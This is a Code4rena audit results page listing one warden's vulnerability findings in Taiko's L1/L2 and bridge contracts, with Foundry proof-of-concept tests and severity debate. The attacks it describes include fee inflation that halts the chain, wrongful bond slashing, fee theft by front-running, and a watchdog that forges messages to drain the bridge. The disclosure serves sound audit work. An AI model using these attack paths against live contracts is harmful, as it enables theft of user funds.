Platform: Code4rena
Start Date: 04/03/2024
Pot Size: $140,000 USDC
Total HM: 19
Participants: 69
Period: 21 days
Judge: 0xean
Total Solo HM: 4
Id: 343
League: ETH
Rank: 1/69
Findings: 7
Award: $39,108.58
🌟 Selected for report: 4
🚀 Solo Findings: 2
🌟 Selected for report: monrel
19855.9959 USDC - $19,856.00
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L2/TaikoL2.sol#L140-L143
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L2/TaikoL2.sol#L262-L293
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L2/TaikoL2.sol#L145-L152
The base fee calculation in the anchor() function is incorrect. Issuance is over-inflated and will either lead to the chain halting or a severely deflated base fee.
We calculate the 1559 base fee and compare it to block.basefee
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L2/TaikoL2.sol#L140-L143
(basefee, gasExcess) = _calc1559BaseFee(config, _l1BlockId, _parentGasUsed);
if (!skipFeeCheck() && block.basefee != basefee) {
    revert L2_BASEFEE_MISMATCH();
}
But the calculation is incorrect
if (gasExcess > 0) {
    // We always add the gas used by parent block to the gas excess
    // value as this has already happened
    uint256 excess = uint256(gasExcess) + _parentGasUsed;

    // Calculate how much more gas to issue to offset gas excess.
    // after each L1 block time, config.gasTarget more gas is issued,
    // the gas excess will be reduced accordingly.
    // Note that when lastSyncedBlock is zero, we skip this step
    // because that means this is the first time calculating the basefee
    // and the difference between the L1 height would be extremely big,
    // reverting the initial gas excess value back to 0.
    uint256 numL1Blocks;
    if (lastSyncedBlock > 0 && _l1BlockId > lastSyncedBlock) {
        numL1Blocks = _l1BlockId - lastSyncedBlock;
    }

    if (numL1Blocks > 0) {
        uint256 issuance = numL1Blocks * _config.gasTargetPerL1Block;
        excess = excess > issuance ? excess - issuance : 1;
    }

    gasExcess_ = uint64(excess.min(type(uint64).max));

    // The base fee per gas used by this block is the spot price at the
    // bonding curve, regardless the actual amount of gas used by this
    // block, however, this block's gas used will affect the next
    // block's base fee.
    basefee_ = Lib1559Math.basefee(
        gasExcess_, uint256(_config.basefeeAdjustmentQuotient) * _config.gasTargetPerL1Block
    );
}
Instead of issuing _config.gasTargetPerL1Block for each L1 block, we end up issuing issuance = (_l1BlockId - lastSyncedBlock) * _config.gasTargetPerL1Block.
lastSyncedBlock is only updated every 5 blocks:
if (_l1BlockId > lastSyncedBlock + BLOCK_SYNC_THRESHOLD) {
    // Store the L1's state root as a signal to the local signal service to
    // allow for multi-hop bridging.
    ISignalService(resolve("signal_service", false)).syncChainData(
        ownerChainId, LibSignals.STATE_ROOT, _l1BlockId, _l1StateRoot
    );
    lastSyncedBlock = _l1BlockId;
}
If anchor() is called on 5 consecutive blocks we end up issuing in total 15 * _config.gasTargetPerL1Block instead of 5 * _config.gasTargetPerL1Block.
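The inflation is easy to check arithmetically. The following few lines of Python model the issuance term of the loop above (illustrative only, using the gasTargetPerL1Block value from the POC config further down):

```python
# Illustrative model of the flawed issuance term, not the contract itself.
# lastSyncedBlock stays at 1 for 5 consecutive anchor() calls because it
# only updates every BLOCK_SYNC_THRESHOLD (5) blocks, so the delta grows.
GAS_TARGET = 15 * 10**6 * 4  # gasTargetPerL1Block from the POC config

last_synced_block = 1
issued = sum(
    (l1_block_id - last_synced_block) * GAS_TARGET  # numL1Blocks * gasTargetPerL1Block
    for l1_block_id in range(2, 7)  # anchor() for L1 blocks 2..6
)

expected = 5 * GAS_TARGET  # one gas target's worth per L1 block
print(issued // expected)  # 3: deltas 1+2+3+4+5 = 15 block-targets instead of 5
```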
When the calculated base fee is compared to block.basefee the following happens:
If block.basefee reports the correct base fee, this will end up halting the chain since they will not match.
If block.basefee is using the same flawed calculation, the chain continues but with a severely reduced and incorrect base fee.
Here is a simple POC showing the actual issuance compared to the expected issuance. Paste the code into TaikoL1LibProvingWithTiers.t.sol and run forge test --match-test testIssuance -vv.
struct Config {
    uint32 gasTargetPerL1Block;
    uint8 basefeeAdjustmentQuotient;
}

function getConfig() public view virtual returns (Config memory config_) {
    config_.gasTargetPerL1Block = 15 * 1e6 * 4;
    config_.basefeeAdjustmentQuotient = 8;
}

uint256 lastSyncedBlock = 1;
uint256 gasExcess = 10;

function _calc1559BaseFee(
    Config memory _config,
    uint64 _l1BlockId,
    uint32 _parentGasUsed
)
    private
    view
    returns (uint256 issuance, uint64 gasExcess_)
{
    if (gasExcess > 0) {
        uint256 excess = uint256(gasExcess) + _parentGasUsed;
        uint256 numL1Blocks;
        if (lastSyncedBlock > 0 && _l1BlockId > lastSyncedBlock) {
            numL1Blocks = _l1BlockId - lastSyncedBlock;
        }

        if (numL1Blocks > 0) {
            issuance = numL1Blocks * _config.gasTargetPerL1Block;
            excess = excess > issuance ? excess - issuance : 1;
        }

        // I have commented out the below basefee calculation
        // and return issuance instead to show the actual
        // accumulated issuance over 5 L1 blocks.
        // nothing else is changed
        //gasExcess_ = uint64(excess.min(type(uint64).max));

        //basefee_ = Lib1559Math.basefee(
        //    gasExcess_, uint256(_config.basefeeAdjustmentQuotient) * _config.gasTargetPerL1Block
        //);
    }

    //if (basefee_ == 0) basefee_ = 1;
}

function testIssuance() external {
    uint256 issuance;
    uint256 issuanceAdded;

    Config memory config = getConfig();

    for (uint64 x = 2; x <= 6; x++) {
        (issuanceAdded,) = _calc1559BaseFee(config, x, 0);
        issuance += issuanceAdded;
        console2.log("added", issuanceAdded);
    }

    uint256 expectedIssuance = config.gasTargetPerL1Block * 5;

    console2.log("Issuance", issuance);
    console2.log("Expected Issuance", expectedIssuance);

    assertEq(expectedIssuance * 3, issuance);
}
foundry, vscode
Issue exactly config.gasTargetPerL1Block for each L1 block.
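One possible shape of such a fix, sketched as a Python model (hypothetical: the name last_issuance_block is mine, and the actual fix in the Taiko codebase may differ): credit issuance against the last anchored L1 block rather than lastSyncedBlock, and advance that marker on every anchor() call.

```python
# Hypothetical fix sketch, not the contract code: track the last L1 block
# for which issuance was credited, separately from lastSyncedBlock.
GAS_TARGET = 15 * 10**6 * 4  # gasTargetPerL1Block from the POC config

class GasExcessModel:
    def __init__(self, gas_excess: int):
        self.gas_excess = gas_excess
        self.last_issuance_block = 0  # advances on every anchor, unlike lastSyncedBlock

    def on_anchor(self, l1_block_id: int, parent_gas_used: int) -> int:
        """Returns the issuance credited for this anchor() call."""
        excess = self.gas_excess + parent_gas_used
        issuance = 0
        if self.last_issuance_block and l1_block_id > self.last_issuance_block:
            issuance = (l1_block_id - self.last_issuance_block) * GAS_TARGET
            excess = excess - issuance if excess > issuance else 1
        self.last_issuance_block = l1_block_id  # key difference: always advance
        self.gas_excess = excess
        return issuance

m = GasExcessModel(gas_excess=10)
m.on_anchor(1, 0)  # first anchor: no issuance, just initializes the marker
total = sum(m.on_anchor(b, 0) for b in range(2, 7))
assert total == 5 * GAS_TARGET  # exactly one gas target per L1 block
```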
Other
#0 - c4-pre-sort
2024-03-30T09:38:19Z
minhquanym marked the issue as sufficient quality report
#1 - dantaik
2024-04-02T04:06:09Z
This is a valid bug report. Fixed in this PR: https://github.com/taikoxyz/taiko-mono/pull/16543
#2 - c4-sponsor
2024-04-02T04:06:13Z
dantaik (sponsor) confirmed
#3 - 0xean
2024-04-09T13:06:27Z
I don't see a direct loss of funds here and believe M is the correct severity
2 — Med: Assets not at direct risk, but the function of the protocol or its availability could be impacted, or leak value with a hypothetical attack path with stated assumptions, but external requirements.
3 — High: Assets can be stolen/lost/compromised directly (or indirectly if there is a valid attack path that does not have hand-wavy hypotheticals).
#4 - c4-judge
2024-04-09T13:06:32Z
0xean changed the severity to 2 (Med Risk)
#5 - c4-judge
2024-04-09T18:32:01Z
0xean marked the issue as satisfactory
#6 - c4-judge
2024-04-10T11:34:57Z
0xean marked the issue as selected for report
#7 - 0xmonrel
2024-04-11T11:20:43Z
A halted chain leads to frozen funds. The chain will progress for a minimum of 2 blocks since the calculation is correct when lastSyncedBlock = 0 and when _l1BlockID - lastSyncedBlock = 1.
After the second block the base fee will still be correct as long as excess < issuance for both the inflated and correct calculation, since both result in excess = 1.
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L2/TaikoL2.sol#L279-L282
if (numL1Blocks > 0) {
    uint256 issuance = numL1Blocks * _config.gasTargetPerL1Block;
    excess = excess > issuance ? excess - issuance : 1;
}
At the block where the base fee is incorrect the chain is halted and funds are locked since the anchor now reverts in perpetuity.
In practice Taiko can easily release all funds by upgrading the contracts but I believe such an intervention should not be considered when evaluating the severity of an issue. From C4 Supreme Court session, Fall 2023
Contract upgradability should never be used as a severity mitigation, i.e. we assume contracts are non-upgradable.
I therefore believe a High is fair here
#8 - 0xean
2024-04-11T13:19:40Z
I don't entirely agree since the chain would be halted so soon in its existence, that being said, some amount of funds, albeit small, would likely be lost. @dantaik / @adaki2004 any last comments before this becomes H severity?
#9 - adaki2004
2024-04-11T15:21:18Z
I don't entirely agree since the chain would be halted so soon in its existence, that being said, some amount of funds, albeit small, would likely be lost. @dantaik / @adaki2004 any last comments before this becomes H severity?
Agreed, can do!
#10 - t0x1cC0de
2024-04-11T17:40:45Z
My 2 cents based on what I can see - Med severity report, however I can't see the scenario to be direct enough or have a justifiably high probability to warrant a high severity.
#11 - mcgrathcoutinho
2024-04-11T17:51:23Z
Agreed with @t0x1cC0de, I think this fits the description of Medium since it's more of a leak in value.
2 — Med: Assets not at direct risk, but the function of the protocol or its availability could be impacted, or leak value with a hypothetical attack path with stated assumptions, but external requirements.
#12 - 0xean
2024-04-12T11:01:52Z
awarding as H, final decision.
#13 - c4-judge
2024-04-12T11:01:56Z
0xean changed the severity to 3 (High Risk)
8935.1982 USDC - $8,935.20
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/libs/LibProving.sol#L387-L392
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/libs/LibProving.sol#L189-L199
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/libs/LibVerifying.sol#L178-L189
Both validity and contest bonds can be wrongfully slashed even if the transition ends up being the correct and verified one.
The issue comes from the fact that the history of the final verified transition is not taken into account.
Example 1: Validity bond is wrongfully burned:
At step 2 Bob loses his bond and is permanently written out of the history of P1:
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/libs/LibProving.sol#L387-L392
_ts.validityBond = _tier.validityBond;
_ts.contestBond = 1;
_ts.contester = address(0);
_ts.prover = msg.sender;
_ts.tier = _proof.tier;
Example 2: Contest bond wrongfully slashed:
Bob was correct and T1 was ultimately proven false. Bob still loses his contest bond.
When the guardian overrides the proof they cannot pay back Bob's validity or contesting bond. They are only able to pay back a liveness bond:
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/libs/LibProving.sol#L189-L199
if (isTopTier) {
    // A special return value from the top tier prover can signal this
    // contract to return all liveness bond.
    bool returnLivenessBond = blk.livenessBond > 0 && _proof.data.length == 32
        && bytes32(_proof.data) == RETURN_LIVENESS_BOND;

    if (returnLivenessBond) {
        tko.transfer(blk.assignedProver, blk.livenessBond);
        blk.livenessBond = 0;
    }
}
These funds are now frozen since they are sent to the Guardian contract, which has no ability to recover them:
uint256 bondToReturn = uint256(ts.validityBond) + blk.livenessBond;
if (ts.prover != blk.assignedProver) {
    bondToReturn -= blk.livenessBond >> 1;
}

IERC20 tko = IERC20(_resolver.resolve("taiko_token", false));
tko.transfer(ts.prover, bondToReturn);

ts.prover will be the Guardian since they are the last to prove the block.
POC for example 1. Paste the below code into the TaikoL1LibProvingWithTiers.t file and run forge test --match-test testProverLoss -vv.
function testProverLoss() external {
    giveEthAndTko(Alice, 1e7 ether, 1000 ether);
    giveEthAndTko(Carol, 1e7 ether, 1000 ether);
    giveEthAndTko(Bob, 1e6 ether, 100 ether);
    console2.log("Bob balance:", tko.balanceOf(Bob));
    uint256 bobBalanceBefore = tko.balanceOf(Bob);

    vm.prank(Bob, Bob);

    bytes32 parentHash = GENESIS_BLOCK_HASH;
    uint256 blockId = 1;

    (TaikoData.BlockMetadata memory meta,) = proposeBlock(Alice, Bob, 1_000_000, 1024);
    console2.log("Bob balance After propose:", tko.balanceOf(Bob));
    mine(1);

    bytes32 blockHash = bytes32(1e10 + blockId);
    bytes32 stateRoot = bytes32(1e9 + blockId);

    (, TaikoData.SlotB memory b) = L1.getStateVariables();
    uint64 lastVerifiedBlockBefore = b.lastVerifiedBlockId;

    // Bob proves transition T1 for parent P1
    proveBlock(Bob, Bob, meta, parentHash, blockHash, stateRoot, meta.minTier, "");
    console2.log("Bob balance After proof:", tko.balanceOf(Bob));

    uint16 minTier = meta.minTier;

    // Higher Tier contests by proving transition T2 for same parent P1
    proveHigherTierProof(meta, parentHash, bytes32(uint256(1)), bytes32(uint256(1)), minTier);

    // Guardian steps in to prove T1 is correct transition for parent P1
    proveBlock(David, David, meta, parentHash, blockHash, stateRoot, LibTiers.TIER_GUARDIAN, "");

    vm.roll(block.number + 15 * 12);
    vm.warp(
        block.timestamp + tierProvider().getTier(LibTiers.TIER_GUARDIAN).cooldownWindow * 60 + 1
    );

    vm.roll(block.number + 15 * 12);
    vm.warp(
        block.timestamp + tierProvider().getTier(LibTiers.TIER_GUARDIAN).cooldownWindow * 60 + 1
    );

    // When the correct transition T1 is verified Bob permanently loses his validity bond
    // even though it is the correct transition for the verified parent P1.
    verifyBlock(Carol, 1);

    parentHash = blockHash;

    (, b) = L1.getStateVariables();
    uint64 lastVerifiedBlockAfter = b.lastVerifiedBlockId;
    assertEq(lastVerifiedBlockAfter, lastVerifiedBlockBefore + 1); // Verification completed

    uint256 bobBalanceAfter = tko.balanceOf(Bob);
    assertLt(bobBalanceAfter, bobBalanceBefore);

    console2.log("Bob Loss:", bobBalanceBefore - bobBalanceAfter);
    console2.log("Bob Loss without counting livenessbond:", bobBalanceBefore - bobBalanceAfter - 1e18); // Liveness bond is 1 ETH in tests
}
foundry, vscode
The simplest solution is to allow the guardian to pay back validity and contest bonds in the same manner as for liveness bonds. This keeps the simple design while allowing bonds to be recovered if a prover's or contester's action is ultimately proven correct.
Guardian will pass in data in _proof.data that specifies the address, tiers and bond type that should be refunded. Given that Guardians already can verify any proof this does not increase centralization.
We also need to not recover any reward when we prove with Guardian and _overrideWithHigherProof() is called. If the ts.validityBond reward is sent to the Guardian it will be locked. Instead we need to keep it in TaikoL1 such that it can be recovered as described above:
+if (_tier.contestBond != 0) {
    unchecked {
        if (reward > _tier.validityBond) {
            _tko.transfer(msg.sender, reward - _tier.validityBond);
        } else {
            _tko.transferFrom(msg.sender, address(this), _tier.validityBond - reward);
        }
    }
+}
Other
#0 - c4-pre-sort
2024-03-30T09:20:32Z
minhquanym marked the issue as sufficient quality report
#1 - dantaik
2024-04-03T01:40:28Z
This is a valid report but we knew this "flaw" and the current behavior is by design.
#2 - adaki2004
2024-04-03T09:04:32Z
I'd say acknowledged, but low severity!
This is an attack on the tier system, right? But the economic disincentive for doing so shall be granted by the bonds - not to challenge proofs which we do know are correct, just to make someone lose money as there is no advantage. The challenger would lose even more money - and the correct prover would be refunded by Taiko Foundation.
#3 - c4-sponsor
2024-04-05T06:15:18Z
dantaik (sponsor) acknowledged
#4 - c4-sponsor
2024-04-05T06:15:21Z
dantaik marked the issue as disagree with severity
#5 - c4-sponsor
2024-04-08T08:12:35Z
adaki2004 (sponsor) confirmed
#6 - adaki2004
2024-04-08T08:13:17Z
Sorry our previous response is incorrect. This one shall be considered "Confirmed" and agree with the severity.
#7 - c4-sponsor
2024-04-08T08:13:23Z
adaki2004 marked the issue as agree with severity
#8 - c4-sponsor
2024-04-08T08:13:35Z
adaki2004 marked the issue as disagree with severity
#9 - adaki2004
2024-04-08T08:13:52Z
Severity: medium, (just as: https://github.com/code-423n4/2024-03-taiko-findings/issues/227)
#10 - 0xean
2024-04-09T13:14:47Z
I am going to leave as H, I think there is a direct loss of funds here.
This comment
The challenger would lose even more money
makes me second guess that slightly, but still think H is correct and will welcome comments during PJ-QA
#11 - c4-judge
2024-04-10T11:15:58Z
0xean marked the issue as selected for report
#12 - c4-judge
2024-04-10T11:21:48Z
0xean marked the issue as satisfactory
#13 - c4-judge
2024-04-10T12:32:10Z
0xean marked the issue as primary issue
🌟 Selected for report: zzebra83
Also found by: MrPotatoMagic, ladboy233, mojito_auditor, monrel
2004.2337 USDC - $2,004.23
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/hooks/AssignmentHook.sol#L114-L116 https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/libs/LibProposing.sol#L182
When proposing a block with AssignmentHook the proposer pays the prover with ERC20 tokens by approving a transfer to the AssignmentHook. If the block is not using blobs it must be proposed from an EOA; this means that the approval and the call to propose must be done in separate transactions and could therefore be front-run.
The prover can front-run the proposer to propose another block but still collect the fee from the previous proposer's coinbase since it has approved the transfer.
A proposer pays the prover by giving allowance to the AssignmentHook to transfer tokens to the prover:
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/L1/hooks/AssignmentHook.sol#L114-L116
IERC20(assignment.feeToken).safeTransferFrom(
    _meta.coinbase, _blk.assignedProver, proverFee
);
If blobs are not used the proposeBlock() must be done with an EOA:
if (!LibAddress.isSenderEOA()) revert L1_PROPOSER_NOT_EOA();
proposeBlock() must therefore be called with an EOA and the approval will be done in a separate transaction.
A prover can front-run and use the previous proposer's coinbase to steal their fees while proposing a different block. This block could for example be trivial and cheap to prove with ZK, e.g. a block that only calls anchor().
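The race can be sketched as a toy Python model (all names here - hook, assignment_hook_transfer - are illustrative stand-ins for the AssignmentHook safeTransferFrom pull, not real identifiers):

```python
# Toy model of the front-run. The hook pulls proverFee from the proposer's
# coinbase using a standing ERC20 allowance, mirroring
# safeTransferFrom(_meta.coinbase, _blk.assignedProver, proverFee).
allowances: dict[tuple[str, str], int] = {}  # (owner, spender) -> amount
balances = {"victim": 100, "prover": 0}

def approve(owner: str, spender: str, amount: int) -> None:
    allowances[(owner, spender)] = amount

def assignment_hook_transfer(coinbase: str, prover: str, fee: int) -> None:
    assert allowances.get((coinbase, "hook"), 0) >= fee
    allowances[(coinbase, "hook")] -= fee
    balances[coinbase] -= fee
    balances[prover] += fee

# tx 1: the victim approves the hook, planning to call proposeBlock() in
# tx 2 (EOA-only, so approval and proposal cannot be atomic)
approve("victim", "hook", 10)

# front-run: the prover proposes their own trivial block but reuses the
# victim's coinbase in the assignment, collecting the fee
assignment_hook_transfer(coinbase="victim", prover="prover", fee=10)
assert balances["prover"] == 10 and balances["victim"] == 90
```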
foundry, vscode
A potential solution is to always use the msg.sender of the proposeBlock() call as the coinbase.
Invalid Validation
#0 - c4-pre-sort
2024-03-28T00:28:46Z
minhquanym marked the issue as duplicate of #163
#1 - c4-judge
2024-04-10T11:19:51Z
0xean changed the severity to 3 (High Risk)
#2 - c4-judge
2024-04-10T11:20:08Z
0xean marked the issue as satisfactory
5956.7988 USDC - $5,956.80
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/tokenvault/BridgedERC20Base.sol#L75-L89
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/tokenvault/adapters/USDCAdapter.sol#L43-L45
https://github.com/circlefin/stablecoin-evm/blob/0828084aec860712531e8d79fde478927a34b3f4/contracts/v1/FiatTokenV1.sol#L133-L136
The old bridged token could be stuck if the minting function reverts. These tokens can neither be bridged back nor migrated to the new native token. For the USDCAdapter this would happen if the max minting allowance is reached for the USDCAdapter.
These tokens would most likely lose significant value since they are not redeemable for the actual canonical token.
Each minter has a maximum allowance in USDC; if the limit is reached minting cannot happen.
To migrate a bridged token to a new native token, a user burns their token and mints native tokens through USDCAdapter:
function burn(address _account, uint256 _amount) public nonReentrant whenNotPaused {
    if (_isMigratingOut()) {
        // Only the owner of the tokens himself can migrate out
        if (msg.sender != _account) revert BB_PERMISSION_DENIED();
        // Outbound migration
        emit MigratedTo(migratingAddress, _account, _amount);
        // Ask the new bridged token to mint token for the user.
        IBridgedERC20(migratingAddress).mint(_account, _amount);
    } else if (msg.sender != resolve("erc20_vault", true)) {
        // Only the vault can burn tokens when not migrating out
        revert RESOLVER_DENIED();
    }

    _burnToken(_account, _amount);
}
The USDCAdapter mints native tokens:

function _mintToken(address _account, uint256 _amount) internal override {
    usdc.mint(_account, _amount);
}
but will revert if the allowance is reached:

require(
    _amount <= mintingAllowedAmount,
    "FiatToken: mint amount exceeds minterAllowance"
);
foundry, vscode
Implement functionality to allow old bridged tokens to be bridged back to the canonical token. If the max limit is reached on L2, users should be able to bridge back to L1 and claim the canonical tokens.
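A toy Python model of the stuck-migration path (the numbers and helper names are hypothetical; only the allowance check mirrors the FiatToken require above):

```python
# Sketch of the failure mode: migration mints native USDC through the
# adapter, but the adapter is a USDC minter with a capped allowance.
minting_allowed_amount = 1_000  # remaining allowance of the USDCAdapter

def usdc_mint(amount: int) -> None:
    global minting_allowed_amount
    # mirrors: require(_amount <= mintingAllowedAmount, ...)
    if amount > minting_allowed_amount:
        raise RuntimeError("FiatToken: mint amount exceeds minterAllowance")
    minting_allowed_amount -= amount

def migrate_out(old_token_balance: int) -> None:
    # if the mint reverts, the whole migration reverts and the user keeps
    # a bridged token that cannot be redeemed for the canonical one
    usdc_mint(old_token_balance)

usdc_mint(900)        # earlier migrations consume most of the allowance
try:
    migrate_out(200)  # any migration above the remaining 100 now reverts
except RuntimeError as e:
    print("migration reverted:", e)
```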
Other
#0 - c4-pre-sort
2024-03-30T08:08:55Z
minhquanym marked the issue as duplicate of #279
#1 - c4-judge
2024-04-10T11:33:58Z
0xean marked the issue as satisfactory
5956.7988 USDC - $5,956.80
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L320-L335
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/tokenvault/adapters/USDCAdapter.sol#L43-L45
https://github.com/circlefin/stablecoin-evm/blob/0828084aec860712531e8d79fde478927a34b3f4/contracts/v1/FiatTokenV1.sol#L133-L136
A recalled ERC20 bridge transfer can lock funds in the bridge if the call to mint tokens fails on the source chain. Depending on the native token logic this could either be a permanent lock or a lock of an unknown period of time.
Example of how this can happen with the provided USDCAdapter:
USDC limits the amount of USDC that can be minted on each chain by giving each minter a minting allowance. If the minting allowance is reached, minting will revert. If this happens in a recalled message the tokens together with the ETH value are locked.
If the _amount <= mintingAllowedAmount limit is reached for the USDCAdapter, tokens cannot be minted, but since this is a recalled message the funds are stuck.
Both onMessageInvocation() and onMessageRecalled() call _transferTokens() to either mint or release tokens:
function _transferTokens(
    CanonicalERC20 memory _ctoken,
    address _to,
    uint256 _amount
)
    private
    returns (address token_)
{
    if (_ctoken.chainId == block.chainid) {
        token_ = _ctoken.addr;
        IERC20(token_).safeTransfer(_to, _amount);
    } else {
        token_ = _getOrDeployBridgedToken(_ctoken);
        IBridgedERC20(token_).mint(_to, _amount);
    }
}
A recalled message to bridge USDC L1->L2 will revert when we attempt to mint through the USDCAdapter:

function _mintToken(address _account, uint256 _amount) internal override {
    usdc.mint(_account, _amount);
}
On the following condition in the native USDC contract:

require(
    _amount <= mintingAllowedAmount,
    "FiatToken: mint amount exceeds minterAllowance"
);
Course of events that ends in locked funds:
mintingAllowedAmount
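The locked-recall path can be modeled in a few lines of Python (an assumed simplification of the flow described above; function names are illustrative, not the vault's actual API):

```python
# Toy model: onMessageRecalled() goes through _transferTokens(), and on the
# bridged-token branch that is a mint, which reverts once the adapter's
# minter allowance is exhausted.
minting_allowed_amount = 0  # adapter allowance already used up

def mint(amount: int) -> None:
    if amount > minting_allowed_amount:
        raise RuntimeError("FiatToken: mint amount exceeds minterAllowance")

def transfer_tokens(is_canonical_chain: bool, amount: int) -> None:
    if is_canonical_chain:
        pass  # safeTransfer of the escrowed canonical token
    else:
        mint(amount)  # bridged token: mint via the adapter

def on_message_recalled(amount: int) -> None:
    # the whole recall reverts, so the tokens and the message's ETH value
    # stay locked until the allowance frees up (if ever)
    transfer_tokens(is_canonical_chain=False, amount=amount)

try:
    on_message_recalled(500)
except RuntimeError:
    print("recall reverted; funds remain locked in the bridge")
```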
foundry, vscode
Add new functionality in the vault that allows users to send a new message to the destination chain again with new message data if onMessageRecalled() cannot mint tokens. We give users the ability to redeem for canonical tokens instead of being stuck.
Other
#0 - c4-pre-sort
2024-03-30T08:05:20Z
minhquanym marked the issue as sufficient quality report
#1 - c4-pre-sort
2024-03-30T08:08:48Z
minhquanym marked the issue as primary issue
#2 - dantaik
2024-04-03T01:37:06Z
Thank you for your feedback. In your example, if the user cannot mint tokens in USDCAdapter by using recallMessage, the user can wait and call recallMessage again. That's why recallMessage is retriable.
There is no perfect solution here, and I personally don't want to make the bridge too complicated by introducing this re-send-another-message feature.
Adding a warning on the bridge UI to show a warning message might be a good solution, something like "USDC on Taiko has reached 95% of its max supply cap, bridging USDC to Taiko may end up your fund becoming unavailable for some time until others bridge USDC away from Taiko".
#3 - c4-sponsor
2024-04-05T06:19:37Z
dantaik (sponsor) acknowledged
#4 - c4-judge
2024-04-09T18:31:33Z
0xean marked the issue as satisfactory
#5 - c4-judge
2024-04-10T11:33:57Z
0xean marked the issue as selected for report
#6 - t0x1cC0de
2024-04-11T02:41:23Z
Hey @0xean, flagging this for your review. Based on sponsor's comments above as well as those made here and given the prerequisite + impact, should it (and #271) still be a Med?
Thanks
#7 - 0xean
2024-04-11T10:00:36Z
Their comments simply show there isn't a great solution to the problem; it still represents a loss of user funds (if it goes on forever) or a denial of service and a risk that users should be aware of.
@dontonka / @adaki2004 any last comments here?
#8 - 0xmonrel
2024-04-11T10:26:43Z
I submitted two related issues, this and #271. I believe #271 could be more severe since it could lock a larger portion of old USDC into a state where they cannot be redeemed. I would like to confirm that the sponsor is aware of #271 and that it wasn't missed since it is tagged as a duplicate of this issue.
I am not sure if there is ground for de-duplication but either way I would like to confirm that the sponsor has seen #271.
#9 - adaki2004
2024-04-11T11:09:41Z
Their comments simply show there isn't a great solution to the problem; it still represents a loss of user funds (if it goes on forever) or a denial of service and a risk that users should be aware of.
@dontonka / @adaki2004 any last comments here?
We are OK with med, no issue. Please proceed accordingly - as we don't have:
But please proceed the way which is suitable for the wardens better, we appreciate their efforts. (So not questioning the severity)
#10 - dontonka
2024-04-11T12:04:58Z
I've been tagged by mistake here, I assume that was for @dantaik .
#11 - 0xean
2024-04-12T13:56:13Z
leaving as valid M and with #271 duped.
🌟 Selected for report: monrel
Also found by: Shield, josephdara, t0x1c
1085.6266 USDC - $1,085.63
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/bridge/Bridge.sol#L82-L95
https://github.com/code-423n4/2024-03-taiko/blob/f58384f44dbf4c6535264a472322322705133b11/packages/protocol/contracts/bridge/Bridge.sol#L230-L231
The bridge_watchdog role can forge arbitrary messages and drain the bridge of all ETH and tokens.
bridge_watchdog can call suspendMessages() to suspend and un-suspend a message:
function suspendMessages(
    bytes32[] calldata _msgHashes,
    bool _suspend
)
    external
    onlyFromOwnerOrNamed("bridge_watchdog")
{
    uint64 _timestamp = _suspend ? type(uint64).max : uint64(block.timestamp);
    for (uint256 i; i < _msgHashes.length; ++i) {
        bytes32 msgHash = _msgHashes[i];
        proofReceipt[msgHash].receivedAt = _timestamp;
        emit MessageSuspended(msgHash, _suspend);
    }
}
When this function is called to un-suspend a message we set proofReceipt[msgHash].receivedAt = _timestamp. If the msgHash was not proven before, it will now be treated as proven, since any msgHash with a timestamp != 0 is treated as proven:

uint64 receivedAt = proofReceipt[msgHash].receivedAt;
bool isMessageProven = receivedAt != 0;
bridge_watchdog can therefore forge arbitrary messages and have them treated as proven by first suspending them and then un-suspending them.
bridge_watchdog is supposed to only be able to ban and suspend messages; in the expected worst case bridge_watchdog is limited to DDOSing messages and bans until governance removes the bridge_watchdog.
With the privilege escalation shown here the role can instead drain the bridge of all ETH and tokens.
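A minimal Python model of the flawed bookkeeping (illustrative; the dict stands in for the proofReceipt mapping and type(uint64).max marks a suspended message):

```python
# Model of the suspend/un-suspend round trip that makes an unproven
# message look proven.
UINT64_MAX = 2**64 - 1

proof_receipt: dict[str, int] = {}  # msgHash -> receivedAt

def suspend_messages(msg_hashes: list[str], suspend: bool, now: int) -> None:
    timestamp = UINT64_MAX if suspend else now
    for h in msg_hashes:
        proof_receipt[h] = timestamp

def is_message_proven(msg_hash: str) -> bool:
    # mirrors: bool isMessageProven = receivedAt != 0
    return proof_receipt.get(msg_hash, 0) != 0

# A message that was never proven...
assert not is_message_proven("forged")
# ...becomes "proven" after a suspend/un-suspend round trip.
suspend_messages(["forged"], True, now=1000)
suspend_messages(["forged"], False, now=1001)
assert is_message_proven("forged")
```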
Here is a POC showing that we can forge an arbitrary message by suspending and un-suspending a message
To run this POC, first change the following code in Bridge.t.sol so that we use a real signalService:
register(
+    address(addressManager), "signal_service", address(signalService), destChainId
-    address(addressManager), "signal_service", address(mockProofSignalService), destChainId
);
